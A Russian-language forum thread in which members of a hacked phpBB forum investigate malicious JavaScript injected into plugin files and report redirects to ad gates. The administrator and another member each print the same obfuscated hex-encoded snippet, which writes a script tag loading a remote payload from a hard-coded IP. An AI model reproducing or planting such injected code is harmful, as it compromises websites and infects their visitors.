Page 1 of 2

Осторожно, убьёт!

PostPosted: Mon, 19.06.2017 00:39:30
by thims
А мне браузер только что сказал, что forum.tslabs.info может угрожать безопасности моего компьютера. В качестве причины указал на то, что форум пытается загрузить данные из 134.249.116.78/jquery.js, что по данным браузера, является вредоносным программным кодом. Такие дела...

Re: Осторожно, убьёт!

PostPosted: Mon, 19.06.2017 03:40:50
by TS-Labs
fixed.
В \store\mods\tapatalk-phpbb3\root\mobiquo\smartbanner\appbanner.js обнаружено говно:
Code: Select all
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

Алсо, надо апдейтить движло форума (и ёбаный тапатолк вместе с ним, ибо новые релизы только под phpbb 3.1) но с форума послетают всякие примочки, пиленные вручную.
Ждём, пролезет ли говно ещё раз, если да, то таки придётся поразвлечься.

Re: Осторожно, убьёт!

PostPosted: Mon, 19.06.2017 17:00:12
by nyuk
примочки не нужны. а если с обновлением еще и смайлы слетят, то я просто вот праздник золотого дождя устрою!

Re: Осторожно, убьёт!

PostPosted: Wed, 21.06.2017 19:20:08
by thims
Опять началось...

Re: Осторожно, убьёт!

PostPosted: Wed, 21.06.2017 20:53:38
by TS-Labs
Грохнул тапатолк.

Re: Осторожно, убьёт!

PostPosted: Sun, 25.06.2017 21:52:19
by TS-Labs
Опять цапануло. Удолил.
Вернул тапатолк. Поставил ридонли на файлы, которые заражало. Против лома нет приёма.

Re: Осторожно, убьёт!

PostPosted: Sun, 02.07.2017 22:00:27
by creator
Всё равно что-то гаденькое сидит. Перекидывает на h t t p : // www. cpm10. com / watch?key=блаблабла и оттуда далее.

Re: Осторожно, убьёт!

PostPosted: Sun, 02.07.2017 23:52:17
by Alex Rider
+1, Каспер ругается:

02.07.2017 23.50.38
Dangerous URL blocked: http://134.249.116.78/jquery.js
URL listed in database of malicious URLs
Google Chrome

Re: Осторожно, убьёт!

PostPosted: Mon, 03.07.2017 06:39:30
by creator
А я сделал так:
Code: Select all
route -p add 134.249.116.78 mask 255.255.255.255 192.168.1.100
:)

Re: Осторожно, убьёт!

PostPosted: Thu, 20.07.2017 22:12:55
by moroz1999
Какая-то хрень заражает исходники форума, вписывает такие строчки:
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

Этому подвержены фрагменты ABBC3_Ajax_indicator и MOD : MSSTI ABBC3 (v3.0.11).

Больше деталей снаружи не видно, зараза перенаправляет на рекламу через какой-то мутный гейт. Ищи траюна на серваке, должон быть где-то. Есть вероятность, что заражает рандомные JS файлы, вписывая в начало файла эту ересь.

Re: Осторожно, убьёт!

PostPosted: Fri, 21.07.2017 09:16:15
by VBI
ХУЁВО
передал вопрос тех.директору

директор сказал обновлять форум

Re: Осторожно, убьёт!

PostPosted: Fri, 21.07.2017 19:53:50
by moroz1999
Стопудово есть скриптота на серваке, ищите да обрящете.

Re: Осторожно, убьёт!

PostPosted: Sat, 22.07.2017 03:12:00
by TS-Labs
Для директоров в доступной форме.
Также, директору предлагается сравнить файлы, лежащие в папке форума, с контентом, приезжающим в браузер.
Может тогда обрящет.

Re: Осторожно, убьёт!

PostPosted: Sun, 23.07.2017 18:01:28
by moroz1999
Ну, не сам же браузер заражает скачиваемые скрипты? И не прокси в процессе дописывает хвост к яваскриптам.
Там довольно просто же:
1. Есть успешная попытка взлома сервера, в ходе чего на сервер попал вредный вирус/скрипт/заменен файл. Скорее всего, автоматом были найдены файлы с расширением JS и к ним приписан хвост. Еще бывает, что в php файлы вписывают html-кусок, содержащий <script>.
2. Эти модифицированные JS файлы, будучи скачанными браузером, подкачивают payload с названием jquery.js . Что там внутри - хз, может быть что угодно и каждый раз разное.

То есть, чинить надо не jquery, он тут нипричем, чинить надо модифицированные яваскрипты (походу, пострадали плагины форума). Но до этого надо задаться вопросом - как JS файлы были модифицированы?

Re: Осторожно, убьёт!

PostPosted: Mon, 07.08.2017 19:27:33
by moroz1999
А хостер не может заражать файлы на уровне веб-сервера? Больно уж хитро как-то. Пару раз воспроизведется проблема, а потом надолго тишина.

Re: Осторожно, убьёт!

PostPosted: Tue, 08.08.2017 20:45:45
by VBI
удали нахер этот ABBCode если не хочешь ничего обновлять

Re: Осторожно, убьёт!

PostPosted: Wed, 09.08.2017 10:42:57
by TS-Labs
удалил нахер потому что нехочу обновлять
ты умеешь обновить этот форум чтоб все нахуй не слетело?

Re: Осторожно, убьёт!

PostPosted: Wed, 09.08.2017 12:59:00
by VBI
проблема была только в этом бибибикоде.
давай поживём - увидим

Re: Осторожно, убьёт!

PostPosted: Sat, 12.08.2017 10:08:57
by VBI
r0bat, а что у тебя с аватарой?

Re: Осторожно, убьёт!

PostPosted: Sat, 12.08.2017 12:57:28
by r0bat
А что у меня с аватарой?

Re: Осторожно, убьёт!

PostPosted: Sat, 12.08.2017 14:55:03
by VBI
по твоей ссылке на аватару http://rgho.st/6xP6wPCwh/image.png
меня отправляет на http://meson.ad-l.ink/6xP6wPCwh/image.png

Re: Осторожно, убьёт!

PostPosted: Sat, 12.08.2017 15:57:27
by r0bat
хз, удолил на всякий случай

Re: Осторожно, убьёт!

PostPosted: Sat, 12.08.2017 16:34:02
by WBC
а нефиг аватарки где попало хостить :D
кстати, у себя вирусню не ловил, видать adblockplus+noscript свое дело делают =)

Re: Осторожно, убьёт!

PostPosted: Sun, 13.08.2017 14:37:13
by TS-Labs
VBI wrote:проблема была только в этом бибибикоде.

VBI wrote:по твоей ссылке на аватару

VBI wrote:меня отправляет на

п.1 немного не вяжется в п.2-3, не находишь?

Re: Осторожно, убьёт!

PostPosted: Sun, 13.08.2017 17:12:24
by WBC
TS-Labs wrote:п.1 немного не вяжется в п.2-3, не находишь?

это конкретно фишка самого рыгхоста